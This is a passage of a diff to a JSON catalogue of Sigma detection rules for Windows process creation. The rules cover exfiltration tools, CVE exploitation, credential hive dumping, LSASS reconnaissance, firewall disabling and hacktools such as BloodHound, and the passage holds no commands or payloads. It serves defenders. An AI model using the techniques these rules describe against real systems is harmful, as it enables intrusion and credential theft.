"proc_creation_win_exfiltration_and_tunneling_tools_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" - ] - }, - "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "value": "Exfiltration and Tunneling Tools Execution" - }, - { - "description": "Detects the use of various cli utility related to web request exfiltrating data", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/02", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_exfil_data_via_cli.yml", - "level": "high", - 
"logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", - "value": "Possible Exfiltration Of Data Via CLI" - }, - { - "description": "Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/07/30", - "falsepositive": [ - "System administrator Usage" - ], - "filename": "proc_creation_win_expand_cabinet_files.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", - "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "9f107a84-532c-41af-b005-8d12a607639f", - "value": "Cabinet File Expansion" - }, - { - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/02/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", - "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ] - }, - "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef", - "value": "Exploit for CVE-2015-1641" - }, - { - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/02/22", - "falsepositive": [ - "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" - ], - "filename": "proc_creation_win_exploit_cve_2017_0261.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", - "value": "Exploit for CVE-2017-0261" - }, - { - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/11/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", - "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", - "value": "Droppers Exploiting CVE-2017-11882" - }, - { - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", - "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", - "value": "Exploit for CVE-2017-8759" - }, - { - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "meta": { - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/11/15", - "falsepositive": [ - "Unknown" - 
], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" - ] - }, - "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "value": "Exploiting SetupComplete.cmd CVE-2019-1378" - }, - { - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/11/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", - "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "value": "Exploiting CVE-2019-1388" - }, - { - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/03/25", - "falsepositive": [ - "Unknown" - ], - "filename": 
"proc_creation_win_exploit_cve_2020_10189.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" - ] - }, - "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", - "value": "Exploited CVE-2020-10189 Zoho ManageEngine" - }, - { - "description": "Detects new commands that add new printer port which point to suspicious file", - "meta": { - "author": "EagleEye Team, Florian Roth", - "creation_date": "2020/05/13", - "falsepositive": [ - "New printer port install on host" - ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://windows-internals.com/printdemon-cve-2020-1048/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml" ], "tags": [ "attack.persistence", - "attack.execution", - "attack.t1059.001" + "attack.t1505.003" ] }, - "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", - "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)" + "uuid": "35efb964-e6a5-47ad-bbcd-19661854018d", + "value": "Execution in Webserver Root Folder" }, { - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "meta": { - "author": "Florian Roth", - 
"creation_date": "2020/07/15", - "falsepositive": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" - ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", - "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", - "value": "DNS RCE CVE-2020-1350" - }, - { - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_lpe_cve_2021_41379.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", - "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379" - }, - { - "description": "Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_exploit_systemnightmare.yml", - "level": "critical", - 
"logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/GossiTheDog/SystemNightmare", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", - "value": "SystemNightmare Exploitation Script Execution" - }, - { - "description": "Rename as a legitimate Sysinternals Suite tool to evade detection", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "meta": { "author": "frack113", - "creation_date": "2021/12/20", + "creation_date": "2021/12/10", "falsepositive": [ - "Unknown" + "Network administrator computer" ], - "filename": "proc_creation_win_false_sysinternalsuite.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ] - }, - "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", - "value": "False Sysinternals Suite Tools" - }, - { - "description": "Detects a file or folder's permissions being modified or tampered with.", - "meta": { - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", - "creation_date": "2019/10/23", - "falsepositive": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" - ], - "filename": "proc_creation_win_file_permission_modifications.yml", - "level": "medium", - "logsource.category": "process_creation", - 
"logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", - "https://github.com/swagkarna/Defeat-Defender-V1.2.0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.001" - ] - }, - "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "value": "File or Folder Permissions Modifications" - }, - { - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml", + "filename": "proc_creation_win_nmap_zenmap.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ] - }, - "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", - "value": "Findstr GPP Passwords" - }, - { - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_findstr_lsass.yml", - "level": "high", - "logsource.category": "process_creation", - 
"logsource.product": "windows", - "refs": [ - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ] - }, - "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", - "value": "Findstr LSASS" - }, - { - "description": "Detects usage of findstr with the \"EVERYONE\" keyword. This is often used in combination with icacls to look for misconfigured files or folders permissions", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_findstr_recon_everyone.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ] - }, - "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", - "value": "Suspicious Recon Activity Using Findstr Keywords" - }, - { - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/14", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_firewall_disabled_via_powershell.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_firewall_disabled_via_powershell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": 
"12f6b752-042d-483e-bf9c-915a6d06ad75", - "value": "Windows Firewall Disabled via PowerShell" - }, - { - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/09/02", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_frp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://asec.ahnlab.com/en/38156/", - "https://github.com/fatedier/frp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", - "value": "Fast Reverse Proxy (FRP)" - }, - { - "description": "Attackers may leverage fsutil to enumerated connected drives.", - "meta": { - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "creation_date": "2022/03/29", - "falsepositive": [ - "Certain software or administrative tasks may trigger false positives." - ], - "filename": "proc_creation_win_fsutil_drive_enumeration.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "Turla has used fsutil fsinfo drives to list connected drives. 
https://attack.mitre.org/techniques/T1120/", - "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", + "https://nmap.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nmap_zenmap.yml" ], "tags": [ "attack.discovery", - "attack.t1120" + "attack.t1046" ] }, - "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", - "value": "Fsutil Drive Enumeration" + "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "value": "Nmap/Zenmap Execution" }, { - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", "meta": { "author": "frack113", - "creation_date": "2022/03/02", + "creation_date": "2022/11/18", "falsepositive": [ - "Legitimate use" + "Unknown" ], - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", + "filename": "proc_creation_win_susp_powercfg.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", - "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", - 
"value": "Fsutil Behavior Set SymlinkEvaluation" - }, - { - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/10", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_get_localgroup_member_recon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ] - }, - "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", - "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet" - }, - { - "description": "Detects the execution GMER tool based on image and hash fields.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_gmer_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.gmer.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gmer_execution.yml" + "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" ], "tags": [ "attack.defense_evasion" ] }, - "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "value": "GMER - Rootkit Detector and Remover Execution" + "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "value": "Suspicious 
Powercfg Execution To Change Lock Screen Timeout" }, { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "Detects suspicious flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", "meta": { - "author": "frack113", - "creation_date": "2022/02/13", + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/11/23", "falsepositive": [ - "Legitimate use" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "filename": "proc_creation_win_gotoopener.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gotoopener.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", - "value": "Use of GoToAssist Remote Access Software" - }, - { - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - 
"meta": { - "author": "Nasreddine Bencherchali, X__Junior", - "creation_date": "2022/11/30", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_gpg4win_susp_usage.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", - "value": "Gpg4Win Decrypt Files From Suspicious Locations" - }, - { - "description": "Dump sam, system or security hives using REG.exe utility", - "meta": { - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" - ], - "filename": "proc_creation_win_grabbing_sensitive_hives_via_reg.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" - ] - }, - "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "value": "Grabbing Sensitive Hives via Reg Utility" - }, - 
{ - "description": "Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/04", - "falsepositive": [ - "Legitimate use of one of these tools" - ], - "filename": "proc_creation_win_hacktool_imphashes.yml", + "filename": "proc_creation_win_susp_psexex_paexec_escalate_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml" - ], - "tags": "No established tags" - }, - "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "value": "Windows Hacktool Imphash" - }, - { - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/31", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_adcspwn.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/bats3c/ADCSPwn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml" + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" ], "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.resource_development", + "attack.t1587.001" ] }, - "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "value": "ADCSPwn Hack Tool" + 
"uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "value": "PsExec/PAExec Escalation to LOCAL SYSTEM" }, { - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", "meta": { "author": "Florian Roth", - "creation_date": "2019/12/20", + "creation_date": "2018/06/22", "falsepositive": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "filename": "proc_creation_win_hack_bloodhound.yml", + "filename": "proc_creation_win_susp_sysprep_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "value": "Sysprep on AppData Folder" + }, + { + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/24", + "falsepositive": [ + "Other tools that work with encoded scripts in the command line instead of script files" + ], + "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/BloodHound", - "https://github.com/BloodHoundAD/SharpHound", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml" ], "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", "attack.execution", "attack.t1059.001" ] }, - "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", - "value": "Bloodhound and Sharphound Hack Tool" + "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "value": "Suspicious PowerShell Encoded Command Patterns" }, { - "description": "Detects the use of tools created by a well-known hacktool producer named Cube0x0, which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec etc.)", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to 